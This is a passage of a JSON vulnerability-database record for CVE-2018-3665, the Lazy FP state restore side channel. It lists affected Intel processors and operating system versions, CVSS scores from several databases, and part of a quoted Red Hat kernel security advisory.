                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3537u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3540m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3615qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3630qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3740qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4550u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4558u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4712hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4712mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4900mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4910mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5600u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5650u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5850hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5950hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:8700:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:8700k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:875k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:880:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:960:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:965:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2610ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2640m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2649m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2710qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2715qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3517ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3520m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3612qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3615qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3689y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3720qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4500u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4510u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4610y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4650u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4710hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4710mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4765t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4771:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4785t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4860hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4870hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5550u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5557u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5775r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5850eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:8550u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:8650u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620lm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:660ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:660um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:680um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:870:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:870s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:940xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:950:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2635qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2637m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2677m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2700k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2960xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3517u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3610qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3612qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3667u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3687u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3820qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3840qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4600u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4610m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4750hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4760hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4800mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4810mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4850hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4980hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5500u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5750hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5775c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7600u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7660u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7920hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y70:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y71:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y51:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m3:6y30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m3:7y30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m3:7y32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m5:6y57:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m5:6y54:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m7:6y75:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:7.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:7.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:11.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:11.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:11.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:x64:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:x64:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-3665"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "152897"
      },
      {
        "db": "PACKETSTORM",
        "id": "148486"
      },
      {
        "db": "PACKETSTORM",
        "id": "148246"
      },
      {
        "db": "PACKETSTORM",
        "id": "152883"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201806-895"
      }
    ],
    "trust": 1.0
  },
  "cve": "CVE-2018-3665",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.7,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2018-3665",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "CNVD-2018-13392",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "VHN-133696",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.1,
            "impactScore": 4.0,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.6,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2018-3665",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "Low",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-3665",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-13392",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201806-895",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-133696",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2018-3665",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-13392"
      },
      {
        "db": "VULHUB",
        "id": "VHN-133696"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-3665"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005795"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201806-895"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-3665"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "System software utilizing Lazy FP state restore technique on systems using Intel Core-based microprocessors may potentially allow a local process to infer data from another process through a speculative execution side channel. Intel Core Systems with microprocessors contain information disclosure vulnerabilities.Information may be obtained. An attacker could exploit this vulnerability to obtain values about other processes stored in a number register. \nAttackers can exploit this issue to obtain sensitive information that may aid in further attacks. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nBug Fix(es):\n\n* update the MRG 2.5.z 3.10 kernel-rt sources (BZ#1692711)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2018:2164-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2018:2164\nIssue date:        2018-07-10\nCVE Names:         CVE-2018-3639 CVE-2018-3665 CVE-2018-10675\n                   CVE-2018-10872\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of Load \u0026 Store instructions\n(a commonly used performance optimization). It relies on the presence of a\nprecisely-defined instruction sequence in the privileged code as well as\nthe fact that memory read from address to which a recent memory write has\noccurred may see an older value and subsequently cause an update into the\nmicroprocessor\u0027s data cache even for speculatively executed instructions\nthat never actually commit (retire). As a result, an unprivileged attacker\ncould use this flaw to read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2018-3639, x86 AMD)\n\n* kernel: Use-after-free vulnerability in 